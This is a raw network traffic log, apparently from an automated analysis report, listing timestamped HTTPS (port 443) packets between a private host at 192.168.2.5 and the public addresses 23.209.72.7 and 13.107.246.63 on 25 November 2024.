Nov 25, 2024 11:34:06.853809118 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.856693029 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.856709957 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.856774092 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.856774092 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.856784105 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.863586903 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.863701105 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.863708973 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.866998911 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.867006063 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.867041111 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.867048025 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.867053986 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.867065907 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.867065907 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.867074966 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.867083073 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.867108107 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.867227077 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.870383024 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.870426893 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.870450974 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.870486021 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.870503902 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.870517969 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.870537043 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.870541096 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.870579004 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.878591061 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.878598928 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.878634930 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.878678083 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.878715992 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.878763914 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.882814884 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.882828951 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.882905006 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.882905006 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.882915020 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.884396076 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.884404898 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.884449005 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.884486914 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.884490967 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.884510994 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.884520054 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.884607077 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.888036013 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.888135910 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.888144016 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.895629883 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.895639896 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.895661116 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.895669937 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.895701885 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.895709991 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.895775080 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.897891998 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.897922993 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.898031950 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.898040056 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.902321100 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.902343988 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.902350903 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.902374029 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.902384043 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.902395010 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.902401924 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.902419090 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.902447939 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.902487993 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.903395891 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.903410912 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.903448105 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.903477907 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.903487921 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.903491020 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.903529882 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.903538942 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.903573990 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.911587000 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.911683083 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.911691904 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.912175894 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.912189960 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.912242889 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.912251949 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.912278891 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.920317888 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.920325994 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.920341015 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.920372009 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.920408964 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.920408964 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.920419931 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.920445919 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.928746939 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.928749084 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.928767920 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.928859949 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.928877115 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.928905010 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.928914070 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.928916931 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.928941965 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.928972960 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.928980112 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.929003000 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.929279089 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.929286957 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.929312944 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.929347992 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.929356098 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:06.929383039 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.929449081 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:06.939771891 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.939788103 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.939842939 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.939891100 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.939903021 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.939974070 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.975610018 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.975739956 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.975754023 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.975842953 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.976006985 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.987348080 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.987365961 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.988040924 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.988046885 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:06.989072084 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:06.992080927 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.012878895 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.012901068 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.012953997 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.012964010 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.013017893 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.031270027 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.031280041 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.031373024 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.031390905 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.033749104 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.033757925 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.033802032 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.033818960 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.033826113 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.033879042 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.033883095 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.033905029 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.033927917 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.042292118 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.042325020 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.042335987 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.042351007 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.042365074 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.042376041 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.042404890 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.049006939 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.049015045 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.049073935 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.049082994 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.053750038 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.053767920 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.053811073 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.053826094 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.053858995 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.053879976 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.054584026 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.055685997 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.055830956 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.055994987 CET	49908	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.056679964 CET	49908	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.056689024 CET	443	49908	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.056997061 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.057059050 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.057585955 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.057651997 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.057661057 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.057708025 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.057753086 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.057796955 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.057801008 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.057823896 CET	49910	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.057827950 CET	443	49910	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.058788061 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.058801889 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.058829069 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.058854103 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.058867931 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.058897018 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.059063911 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.060472012 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.060508966 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.060580969 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.060836077 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.060854912 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.061786890 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.061796904 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.061990023 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.062109947 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.062122107 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.062705994 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.062761068 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.062823057 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.062834024 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.062845945 CET	49911	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.062851906 CET	443	49911	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.064723969 CET	49927	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.064734936 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.064805031 CET	49927	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.064913034 CET	49927	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.064928055 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.065711975 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.065778017 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.065789938 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.067935944 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.067953110 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.068030119 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.068037987 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.068079948 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.071996927 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.072097063 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.072105885 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.076145887 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.076160908 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.076215029 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.076225042 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.078438044 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.078453064 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.078517914 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.078533888 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.078582048 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.081060886 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.081124067 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.081131935 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.081502914 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.081522942 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.081608057 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.081608057 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.081615925 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.085993052 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.086096048 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.086102962 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.089925051 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.089942932 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.089977026 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.089983940 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.090018034 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.090039015 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.091998100 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.092017889 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.092078924 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.092087984 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.096235991 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.096252918 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.096394062 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.096401930 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.097012043 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.097091913 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.097100973 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.097781897 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.097800016 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.097866058 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.097873926 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.097939968 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.100497961 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.100513935 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.100549936 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.100557089 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.100589991 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.100706100 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.100727081 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.100748062 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.100752115 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.100769997 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.100773096 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.100781918 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.100804090 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.100840092 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.100847006 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.100850105 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.105128050 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.105207920 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.105211020 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.105258942 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.105528116 CET	49904	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.105540991 CET	443	49904	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.108720064 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.108733892 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.108776093 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.108783960 CET	443	49903	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.108815908 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.110503912 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.110517979 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.110577106 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.110598087 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.110658884 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.116959095 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.117026091 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.117038965 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:07.121402979 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.124571085 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.124622107 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.124627113 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.124699116 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.124757051 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.124757051 CET	49919	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.124764919 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.124773026 CET	443	49919	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.125159025 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.127057076 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.127064943 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.127125978 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.127270937 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.127295971 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.128262043 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.128314972 CET	49909	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.128345013 CET	49909	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.128359079 CET	443	49909	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.130419016 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.130435944 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.130494118 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.130650997 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.130660057 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.131202936 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.131220102 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.131275892 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.131283998 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.131376028 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.146778107 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.146796942 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.146863937 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.146872044 CET	443	49905	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.147017002 CET	49905	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.150163889 CET	49903	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:07.160001040 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.160018921 CET	443	49906	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:07.160059929 CET	49906	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:07.160068989 CET	443	49906	13.107.246.63	192.168.2.5
